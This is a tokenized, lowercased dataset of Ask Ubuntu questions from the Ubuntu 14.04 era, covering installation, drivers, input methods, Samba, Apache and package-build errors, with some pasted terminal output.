450206	how to fix a `` software caused connection abort '' error in ubuntu 14.04 ?	i just performed a clean install ( not an upgrade ) to ubuntu 14.04 ( 64-bit , pc desktop iso ) on a pc that previously had ubuntu 12.04 installed . upon trying to restore my \home directory from a samba server via deja dup , i got the error message : restore failed : software caused connection abort further investigation lead me to find that this is just a symptom of a larger problem . on my home network i have three samba servers . any attempt to use nautilus to copy and paste any content between shared folders on those machines and local folders results in the same error message . there have been two other threads exploring this same error message , plus one additional post with no replies . the first thread - limited to ssh problems - was resolved by eliminating redundant ips on the network . that is not my problem . it 's a small home network , all ips are accounted for . and this problem began immediately upon installation of trusty tahr . minutes before it all worked well under precise pangolin . also , my router reserves ips by mac address , so though i 'm using dhcp on my trusty pc , it 's getting the same ip . no conflicts there . finally , i reinstalled 12.04 as a test , and the problem went away . so imo it 's not an ip problem . the other thread deals with file access issues . to test that possible problem i created a new local folder and chmod'ed 777 permission to myself . then attempting to copy files between that folder and the smb servers , i got the same error . so i assume the problem i 'm seeing is not an access issue either . anyone have any idea what 's causing this error ? and how to fix it ? thanks .
450207	how to move downloads folder from bookmarks to places ?	i cant move the downloads folder from bookmarks to places in 14.04 . i did some mistakes and first i lost the downloads folder . now i cant move it into the places . does anybody have an idea ?
450209	black spaces in panels/windows/dialog	a lot of windows look have black spaces everywhere like this : however , when i take a screenshot , the black space is replaced with transparency , and the screenshot looks like this : this is n't that bad but it gets more annoying when stuff like this happens : it also has nothing to do with the theme i 'm using ( numix ) . the same happens with adwaita . does anyone know how to fix this ? thanks !
450210	kernel panic not syncing fatal exception in interrupt	i have ubuntu installed on 2 of my computers and one of them has been acting up . first it started as the screen randomly freezing and i would have to restart to fix it , then just now it goes to a black and white text screen and its been doing this more frequently , i did n't install any more programs it just randomly started doing this more frequently after i had to shut it down w/ the power button after a screen freeze . it says the error message kernel panic not syncing fatal exception in interrupt . any help ?
450211	apache shows index of/ instead of default index html	i installed apache2 on my ubuntu 13.10 and it works without any problems . i can see the default index page ( which is located in /var/www/index.html ) by typing localhost/ in the address bar today , after i upgraded my ubuntu to 14 . 04 the localhost server does n't work any longer and shows index of/ page instead i have tried to reinstall everything ( including php5 , phpmyadmin , and mysql ) but the problem is still there . how do i fix this ?
450214	trouble on shutdowning my laptop	i have a laptop compaq presario r4000 and because of the end of support to windows xp -installed previously on it- i decided finally to install ubuntu 12.04 lts . now i have only this os on my laptop , but it does n't shutdown . it closes every apps and goes to the screen with the name of ubuntu and the little spots below , and continues like this for all the time . i have to push the on/off button for a 5 seconds and shutdown my laptop like this . i tried to change grub , and to change modules , and to try to shutdown from the terminal but it does n't run . 多may someone help me , please ? thank you and best regards .
450219	ca n't install the lib32gcc1 package	i ca n't find any information how to install libraries to use 32bit software like steamcmd to run game servers . what 's the package name for the 14.04 version of 32bit libraries ? sudo apt-get install lib32gcc1 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . lib32gcc1 : depends : libc6-i386 ( > = 2.2.4 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . this command does not work at all , and gives out this error .
450220	how do i remove password ?	how do i remove password so at startup i do not have to enter a password . i am running ubuntu 12.04 . i have tried searching answers .
450221	unable to access fresh installation of 14.04 with full disk encryption	i decided to attempt a full disk encryption on the 2nd computer where i 'm installing 14.04 . it 's a fresh installation . it used to contain a 12.04 version , but i opted for the `` erase disk and install ubuntu '' option . i also added lvm ( logical volume management ) , do n't think that matters in this context , but it is an option i included . the problem i 've run into is that my password is not accepted as correct when the installation has finished and i attempt to boot for the first time . i 've attempted to install it twice . first time , my password included some symbol characters that are located differently on us keyboards . since i run into this kind of situation from time to time ( having to type with my norwegian keyboard as if it is a us keyboard ) , i know where the keys are located . so i tried typing it as if i have a us keyboard , but got the same result . on the second attempt , i only included only numbers and upper/lower case characters in the password . there should be no keyboard layout issue for that password . but once again , the password was rejected and i was unable to continue . the password is quite long , 20+ characters . perhaps that is an issue ? any ideas ?
450237	can not install pcmanfm version 1.2.0	i have lubuntu 13.10 . i am trying to install pcmanfm 1.2.0 . i go to the prompt , use cd command to go to my downloads directory and type ./configure to start the process of installing it . errors i am getting reads as follows : checking for msgmerge ... /usr/bin/msgmerge checking for msgfmt ... /usr/bin/msgfmt checking for gmsgfmt ... /usr/bin/msgfmt checking for perl ... /usr/bin/perl checking for perl > = 5.8.1 ... 5.14.2 checking for xml : :parser ... ok checking for pkg-config ... /usr/bin/pkg-config checking pkg-config is at least version 0.9.0 ... yes checking for xlib ... no configure : error : package requirements ( `` x11 '' ) were not met : no package 'x11 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xlib_cflags and xlib_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . edwin @ edwin-thinkpad-r52 : ~/downloads/pcmanfm-1.2.0 $ i am just new to lubuntu ( was xp for years and years ) . what causes this and how can it be fixed so i can continue installing version 1.2.0 ?
450239	deleting windows partition , allocating space to linux	i have a 500gb drive allocated in half for linux and windows . but , i 've decided to get rid of windows and stay with linux . i have gparted and i can delete the windows partition , but i ca n't seem to resize the linux partition to take up the new space . anyone out there that can help ?
450243	upgrade from kubuntu 13.10 to 14.04 fails at 65 %	upgrade from kubuntu 13.10 to 14.04 abort at 65 % . when i restart and try to log in show this : unable to launch `` gnome-session -- session=cairo-dock '' x session -- - `` gnome-session -- session=cairo-dock '' not found ; falling back to default session . what can i do ? i 'm thinking of installing kubuntu 14.04 from a usb .
450248	can i install ubuntu14.04 on my system ?	my computer has 2gb ram and is it possible to install ubuntu trusty tahr on my system and will it run smootly on my system
450251	slow boot when i turn on computer	my computer just became slow to boot up i added some software and did n't work for me and now i think there some parts still in there trying to start up when i boot
450252	steam games auto quit ?	i got a bit of a problem here . i just recently wiped my hp laptop from windows 8 and installed ubuntu , i want to play garrys mod on steam but all my workshop items are re-downloading . i didnt want to sit and wait so i decide to work on something else on my computer in the mean time . but when i go to check on the downloads in-game , the game somehow closes itself along with steam and i have to start up steam again . is there any work around or something ? i figured since garrys mod is compatible with linux i thought it would be fine , but i guess not .
450253	how get hp-setup to install printer ?	i am trying to install and use ubuntu 12.04 on my laptop without windows . i have an hp laserjet 1020 printer but ca n't get it to print . the printer looks like it is installed but wo n't print ; not even a test page . i am on a page that says , `` this printer requires a downloadable driver plug-in . use hp-setup to intall the printer , and to download and install the plug-in . '' it appears that i have the printer installed but how do i get the plug in i need ? the message above did not give a name for the plug=in .
450255	installing sogou 搜狗拼音	sogou ( 搜狗 ) is a popular chinese input software . for ubuntu 14.04 , they worked with the team of ubuntu kylin to create a linux version of their software . it 's based on fcitx input software , which is developed by the fcitx team on launchpad . i installed it on my laptop with ubuntu 14.04 without any problem , and it works great ! but , i have a netbook at home , with lubuntu 14.04 installed on it . and i want to enjoy sogou on it as well . i added the ppa of fcitx team : deb http : //ppa.launchpad.net/fcitx-team/dailybuild-fcitx-master/ubuntu trusty main i then ran apt-get update & & install fcitx i downloaded the sogou software from http : //pinyin.sogou.com/linux/ , and installed it ( ok ) restart , i choose fcitx as my input method , start it from commandline $ fcitx ( as it does n't start automatically ) . i 'm now using fcitx , but sogou does n't work . when selected , it 's like using the regular keyboard ( no chinese character ) . i read this : https : //wiki.archlinux.org/index.php/fcitx_ ( 简体中文 ) ‎ and added this to .xprofile export gtk_im_module=fcitx export qt_im_module=fcitx export xmodifiers= '' @ im=fcitx '' but with no help . so do you have any idea on how to make sogou pinyin ( 搜狗拼音 ) work on lubuntu 14.04 ( lxde ) ? on the left ubuntu 14.04 , on the right lubuntu 14.04 ( fcitx app indicator ) if i run $ fcitx-qimpanel then it seems to improve on lubuntu , but i still can not choose the sogou entry from the menu : when i select the sogou entry in the menu , nothing happen . it 's when i click on the fcitx icon that the message appears in the terminal . gumeiren @ gumeiren-n128 : ~ $ fcitx ( i first need to run fcitx , otherwise fcitx-qimpanel has no effect ) gumeiren @ gumeiren-n128 : ~ $ fcitx-qimpanel gumeiren @ gumeiren-n128 : ~ $ maincontroller : :init ( ) qmetaobject : :connectslotsbyname : no matching signal for on_checkbox_tab3_fontsize_toggled ( bool ) ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 152 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 148 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 152 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 152 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 152 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 154 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 152 missing '=' '' 1.0.0.0011 '' '' 系统词频 : 20110527 '' '' 组词数据 : 20110307 '' '' 20101217 '' '' 编译时间 : apr 17 2014 07:25:54 '' void systemtraymenu : :init ( ) gumeiren @ gumeiren-n128 : ~ $ ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '=' ( warn-1798 /build/buildd/fcitx-4.2.8.3+1907+201403101923~ubuntu14.04.1/src/lib/fcitx-config/fcitx-config.c:922 ) invalid entry : line 150 missing '='
450256	problem setting up audacity with 14.04	i installed 14.04 on a lenovo t60 laptop . somewhere between audacity , jack , alsa , and pulseaudio , audacity wo n't either record , or playback sound . when it does record , the microphone is always on , and the sound is tinny , even when recording streaming media . i ca n't find any combination of drivers that work . the microphone was set to no boost audio , but muting it disables all recording . lenovo originally had this problem but the drivers were modified for windows . under windows audacity could switch between microphone for voice recording and stereo mix for streaming media . there is no stereo mix option when used on ubuntu . audacity for ubuntu is compiled and maintained by the ubuntu community .
450266	an easy way to create a desktop shortcut ?	i wonder , is n't there still an easy way to create a desktop shortcut in ubuntu 14.04 ( or unity ) ? there is no context menu on desktop doing this . so i tried the following : i looked for an app i want to create a shortcut for in the dash , when i tried to drag it to the desktop . and guess what ? i got the error :
450269	make : dh : command not found	when i try to run the .run file on nautilus the pointer changes into a wheel and does nothing , i did change the permission to make it executable , also at first it only tryed to open it with gedit so i had to manually choose to execute it as a program from the menu . after i run it on terminal and try to build the package for later install it gives me this error and i ca n't figure out what 's the issue . package build failed ! package build utility output : ./packages/ubuntu/ati-packager.sh : 294 : ./packages/ubuntu/ati-packager.sh : debclean : not found dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:13.251-0ubuntu1 dpkg-buildpackage : source distribution trusty dpkg-buildpackage : source changed by amd : advanced micro devices . < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.vrob7j dpkg-buildpackage : host architecture amd64 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g '' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/x86_64-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |13.251|g '' \ -e `` s| # srcxarch # |xpic_64a|g '' \ -e `` s| # srcarch # |x86_64|g '' \ -e `` s| # srcotherarch # |x86|g '' \ -e `` s| # srclibdir # |lib64|g '' \ -e `` s| # deb_host_multiarch # |x86_64-linux-gnu|g '' \ -e `` s| # other_arch # |i386-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic_64a -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86_64/usr/sbin \ arch/x86_64/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build make : dh : command not found make : *** [ build-arch ] error 127 dpkg-buildpackage : error : debian/rules build gave error exit status 2 cleaning in directory . dpkg-checkbuilddeps : unmet build dependencies : debhelper ( > = 7 ) dh-modaliases execstack debuild : fatal error at line 1328 : you do not appear to have all build dependencies properly met . you can use mk-build-deps to generate a dummy package which depends on all the required packages , or you can install them manually using dpkg or apt using the error messages just above this message . dpkg-buildpackage : source package fglrx-installer dpkg-buildpackage : source version 2:13.251-0ubuntu1 dpkg-buildpackage : source distribution trusty dpkg-buildpackage : source changed by amd : advanced micro devices . < http : //ati.amd.com/support/driver.html > dpkg-source -- before-build fglrx.icootp dpkg-buildpackage : host architecture amd64 debian/rules build # create important strings for i in 10fglrx \ dkms.conf \ fglrx.install \ fglrx-dev.install \ fglrx-dev.links \ fglrx-amdcccle.install \ fglrx.grub-gfxpayload \ fglrx.dirs \ fglrx.links \ fglrx.postinst \ fglrx.postrm \ fglrx.preinst \ fglrx.prerm \ overrides/fglrx ; do \ sed -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # libdir # |usr/lib|g '' \ -e `` s| # libdir32 # |usr/lib32|g '' \ -e `` s| # bindir # |usr/bin|g '' \ -e `` s| # sysconfdir # |etc|g '' \ -e `` s| # mandir # |usr/share/man/man1|g '' \ -e `` s| # ldsoconf # |usr/lib/fglrx/ld.so.conf|g '' \ -e `` s| # altldsoconf # |usr/lib/fglrx/alt_ld.so.conf|g '' \ -e `` s| # altpriority # |1000|g '' \ -e `` s| # pxaltpriority # |900|g '' \ -e `` s| # autostartdir # |etc/xdg/autostart|g '' \ -e `` s| # datadir # |usr/share|g '' \ -e `` s| # pkgdeskdir # |usr/share/fglrx|g '' \ -e `` s| # pkgdatadir # |usr/share/fglrx|g '' \ -e `` s| # pkgconfigdir # |usr/lib/fglrx|g '' \ -e `` s| # pkgbindir # |usr/lib/fglrx/bin|g '' \ -e `` s| # pkglibdir # |usr/lib/fglrx|g '' \ -e `` s| # pkglibdir32 # |usr/lib32/fglrx|g '' \ -e `` s| # pkgdriversdir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextra # |usr/lib/x86_64-linux-gnu/xorg/extra-modules|g '' \ -e `` s| # pkgextensiondir # |usr/lib/fglrx/xorg|g '' \ -e `` s| # xorgextensionsdir # |usr/lib/xorg/modules/extensions|g '' \ -e `` s| # drivername # |fglrx|g '' \ -e `` s| # driverdevname # |fglrx-dev|g '' \ -e `` s| # driversrcname # ||g '' \ -e `` s| # includedir # |usr/include|g '' \ -e `` s| # pkglibconfdir # |lib/fglrx|g '' \ -e `` s| # grubblklistdir # |usr/share/grub-gfxpayload-lists/blacklist|g '' \ -e `` s| # pkgxmoddir # |usr/lib/fglrx/xorg/modules|g '' \ -e `` s| # pxdir # |usr/lib/pxpress|g '' \ -e `` s| # pxdir32 # |usr/lib32/pxpress|g '' \ -e `` s| # pxxmoddir # |usr/lib/pxpress/xorg/modules|g '' \ -e `` s| # pxdirname # |pxpress|g '' \ -e `` s| # pxlibdir # |usr/lib/pxpress/lib|g '' \ -e `` s| # pxlibdir32 # |usr/lib32/pxpress/lib|g '' \ -e `` s| # pxldsoconf # |usr/lib/pxpress/ld.so.conf|g '' \ -e `` s| # altpxldsoconf # |usr/lib/pxpress/alt_ld.so.conf|g '' \ -e `` s| # cversion # |13.251|g '' \ -e `` s| # srcxarch # |xpic_64a|g '' \ -e `` s| # srcarch # |x86_64|g '' \ -e `` s| # srcotherarch # |x86|g '' \ -e `` s| # srclibdir # |lib64|g '' \ -e `` s| # deb_host_multiarch # |x86_64-linux-gnu|g '' \ -e `` s| # other_arch # |i386-linux-gnu|g '' \ debian/ $ i.in > debian/ $ i ; \ done # remove exec bit on everything find arch \ etc \ lib \ module \ usr \ xpic_64a -type f | xargs chmod -x find : `module ' : no such file or directory # set executable on user apps find arch/x86_64/usr/sbin \ arch/x86_64/usr/x11r6/bin \ usr/sbin/ -type f | xargs chmod a+x # set exec bit on scripts find lib etc debian -name `` *.sh '' -type f | xargs chmod +x # set the permissions on the pxpress scripts chmod 744 debian/pxpress/switch* dh build make : dh : command not found make : *** [ build-arch ] error 127 dpkg-buildpackage : error : debian/rules build gave error exit status 2 [ error ] generate package - error generating package : ubuntu/trusty on irc someone told me it could be devscripts but after installing it still gave me the error so i uninstalled it again . i 'm trying to install this because the one in ubuntu fglrx-updates wo n't let me open amdccl as administrator , a little black window opens requesting the password but it wo n't do anything after and it closes too fast to see any message . any ideas ? by the way i also used this command sudo sh *.run -- buildpkg ubuntu/trusty but i think i got the same error as well . dang , i checked the ati site http : //support.amd.com/en-us/kb-articles/pages/amdcatalyst13-12linreleasenotes.aspx it seems like the driver is not compatible with 14.04 or kernel 3.13 but i 'm just trying to build the package not install it , it should at least do that right ? i still would like to fix the issue .
450270	ubuntu support in thailand	i have noticed quite a few competitively priced ubuntu-loaded laptops on sale in large supermarkets in thailand in recent weeks . who actually sanctions the loading of ubuntu on such major brands as hewlett packard for sale in thailand ? and how much user support has been arranged for ubuntu users who are primarily thai speakers ? certainly it is not difficult to use thai script on the keyboard and in say libre office . i have figured that out because i sometimes need to include a few words in thai script in my work . how are thai speakers assisted with configuration issues , for example . my reason for asking is that i would now have no qualms about recommending ubuntu to other english-speaking expatriates here , , but i 'm not yet sure i could do the same with my students . this is important for the many locals who are still say using windows xp .
450273	how do i install cuda ?	how do i install cuda on 14.04 ? nvidia-cuda-toolkit got removed from this distribution . i tried installing cuda 6.0 toolkit from nvidia 's website , but it only says it works for 13.10 , so that did n't work either ( not surprisingly ) .
450278	ubuntu 14.04 trusty does n't utilize hot corners after rebooting	everytime i reboot , i 've to turn off and on hotcorners from unity-tweak-tool . other wise hot corners do n't work . any fix ? ? thanks in advance !
450280	`` open in terminal '' action in nautilus in ubuntu 14.04 ?	i 've gotten used to the `` open in terminal '' option when right clicking in nautilus . i used it a lot in 12.04 , but it seems to have disappeared in 14.04 . $ sudo apt-get update [ ... ] $ sudo apt-get install nautilus-open-terminal reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nautilus-open-terminal $ sudo apt-get install nautilus-actions reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nautilus-actions how do i get this feature in 14.04 ?
450281	trying to load 14.04	when xubuntu reboots , i sucessfully enter my login and password . then it sticks on : myname @ ubuntu-computername : ~ $ how do i proceed from this ? thanks .
450287	running lubuntu with a 32-bit notebook	i have an hp 5101 mini notebook running xp . the hp is a 32-bit machine i would like to install the new lubuntu 14.04 but the website download page for 1404 does not seem to give an option for my needs . appreciate any guidance .
450288	ubuntu 14.04 not booting	i downloaded ubuntu 14.04 and burn it to disk and when i boot my desktop pc with ubuntu live dvd then only ubuntu startup logo appeared with purple background and nothing happened after it.but i also creat a live usb with unetbootin and here also same problem exists .
450289	ubuntu 14.04 slow on asus eeebox pc eb1030	so i upgraded to ubuntu 14.04 from 12.04 with a usb but i have internet , my computer is really slow at 1024x768 definition , everything works super slow , windows closing and opening and streaming videos , everything ive used so far.but it works fine at 800x600 definition , i want it to be fine at the higher definition , how do i make it run well at 1024x768 ? in additional drivers nothing shows , and my computer mirrors by default for some reason , i tried stopping it from mirroring but most buttons dont want to work and weird glitches happen , the system doesnt work well when not mirroring , i dont care if it mirrors or not i just want good performance .thank you in advance for any answers ! ! here are the computer specs processor 1.8 ghz 8032 intelâž atomâ˘ cedar trail dual core cpu ram 2 gb ddr3 memory speed 1066 mhz hard drive 32 gb graphics coprocessor graphics media accelerator hd wireless type 802.11b , 802.11g , 802.11n number of usb 2.0 ports 4 brand name asus item model number eb1030-b003l
450294	how to switch from unity to gnome	default ui for ubuntu 14.04 being unity , want to switch to gnome . ca n't find usual way to switch at login screen as mentioned here . http : //www.techienote.com/2011/03/switching-to-gnome-in-ubuntu-11-04.html
450296	trusty tahr upgrade problem	i want to upgrade from saucy to trusty tahr.i made a bootable dvd of trusty.but when i boot from the dvd the installation gives me these options a dual boot win7 and ubuntu 13.10 detected . 1.remove ubuntu 13.10 do a fress install 2.remove win 7 3.remmove both 4.other i just want to upgrade to trusty without loosing my apps and settings . i tried upgrading from software updater but it is not showing new releases.i tried changing the server locations but no use.please help me .
450297	apple pismo g3 preparing a bootable disk	can someone explain to me how to make a bootable disk where i can load xbuntu ppc on my mac g3 pismo . forget the bootable usb stick , not possible on this computer . i have external firewire drives . you can not boot from the cd either on this machine . i would be willing to buy a drive with ubuntu or xbuntu installed and install it on my machine . i have tried everything without success .
450298	how to get ubuntu distribution 's full code name ?	$ lsb_release -c codename : trusty $ cat /etc/issue ubuntu 14.04 lts \n \l $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04 lts '' output 's of the above commands shows only the partial code name ( ie , trusty ) . how do i get the full codename ( trusty tahr ) of my installed ubuntu system ?
450300	upgrade to trusty from saucy without full upgrade	i 've modified most of my ubuntu 13.10 by removing unity etc . now running do-release-upgrade -d gives a huge list of upgrades that re-adds some of the packages i removed etc . i 'd like to just upgrade the existing packages to 14.04 packages without installing a bulk of new packages that i previously uninstalled . how can i do this ?
450302	uml tool umbrello not opening diagrams	i am using umbrello tool for uml diagrams in ubuntu 13.10 . but i have a problem that i when i open umbrello after few days my all previous diagrams are not shown but all the items for all diagrams in tree view window are viewable . please tell me how i solve this problem and can see my diagrams ? thanks
450303	wireless with lubuntu 14.04 on notebook	will tweaks have to be made or drivers reinstalled to re-obtain wireless if i download lubuntu 14.04 ? i have an hp 5101 mini and have never done such an installation before . my netbook runs on xp at the moment .
450306	upgraded to 14.04 from 13.10 and it made my internet slow	for some reason my computer now got extremely slow , disconnects and some times wo n't work after upgrading from 13.10 . i had no problems at all with 13.10 , i wish it were the same with 14.04 . is there anything i can do to fix this
450307	should i remove unused desktop ?	i am using the ubuntu 14.04 lts . the family member who set it up for me downloaded several desktops for me to try in addition to the ubuntu desktops including the gnome , xdce and kde desktops . i have found that i prefer the kde 4.8 desktop . i have read in your âask ubuntuâ that having several desktops can cause conflicts . the family member who set the system up said it would not cause conflicts as long as i did not use any of the other desktops . should i remove all but the ubuntu desktops and the kde desktop which i prefer ? if so , how do i handle any shared applications such as the vlc media player ?
450309	remove 12.04 which installed by wubi and install 14.04	i have windows seven also i installed ubuntu 12.04 with wubi . i have n't had any problem with my 12.04 . now i downloaded 14.04 32 bit and i make my flash boot able with this guide also i uninstall my 12.04 from add or remove program ! ! ( ... wubi make this ability ) now what next ? when i start my computer still i see grub ( but i think i should not see that because i uninstall that from win 7 ) also what i should do with my boot able flash- which i installed 14.04 on that- in order to install that . note my aim is to format windows 7 and 12.04 and just have 14.04 on my computer .
450310	ubuntu process monitoring - using a cluster graph	good evening , i am looking for a way to monitor running processes in the form of a cluster graph . in other words , a method for me to visualize all processes and their dependencies . even if there is a way , but it includes pieces multiple apps together , i.e . one for retrieving the data , and another to graph it , as long as it works it is fine with me . if the graph where to be updated in real time , or in a specific time interval that would be a like icing on a cake . also , unfortunately , i have limited knowledge with linux , but using the terminal and using unofficial sources is n't an issue . i appreciate the help .
450312	installing clonezilla ubuntu	hello i am attempting to install clonezilla on ubuntu . i received an error message regarding needing to set a name server address so i set my name server ip address to 8.8.4.4 . when i attempt to run the command drblsrv -i it begins connnecting but around 22 % begins stating err no address associated with hostname . please tell me what the problem is thanks . requested output of /etc/hosts :
450315	reset previous wallpaper after restart	what is the path for set wallpaper in ubuntu 12.04 ? i want to reset previous wallpaper after restart computer ? if i change my desktop wallpaper and when i restart my computer it change back to specific picture .
450317	dsl not connecting to internet from upgraded ubuntu 14.04	i have a dsl connection with username , password and service name . earlier i can connect to the internet through this dsl from ubuntu 13.04 . now i upgraded to ubuntu 14.04 and it was n't connecting anymore . how can i fix it ?
450318	choppy sound when using dash - ubuntu 14.04	when i am listening to music or watching youtube , the sounds become distorted at the moment i open the unity dash to search for something . using headphones instead of the built-in speakers does not help . i have tried the solutions here : distorted choppy audio in precise http : //www.ejoom.com/blog/117-skype-linux-ubuntu-sound-choppy-distorted-crackling-scratchy but they do n't work for me . any help ? my laptop is a lenovo thinkpad t60
450321	copy/cut and paste sometimes does n't work on nautilus	copy/cut and paste sometimes does n't work on nautilus , the bug seems to be random and the only way to fix it is closing and opening nautilus again . update : i just noted that when this happen all keyboard shortcuts stop working , trying to copy and paste using the mouse does n't work either . ubuntu : 14.04 | nautilus : 3.10.1 is there a fix for this ?
450323	how do i get rid of this anthy toolbar ?	i toggle between writing in japanese and english on my computer , usitng anthy and ibus . i just recently installed ubuntu 14.04 on two computers , and set up my language input options the same as i have for years , and for the most part it works fine and i have all the functionality i wan the only problem is that on one of the computers , my laptop , whenever i switch to anthy to input japanese , this floating toolbar pops up just under where i 'm typing' i can ' find any option for getting rid of this thing . it does n't show up on my desktop computer , so i know it does n't have to be there for anthy to work . how do i get rid of this toolbar ?
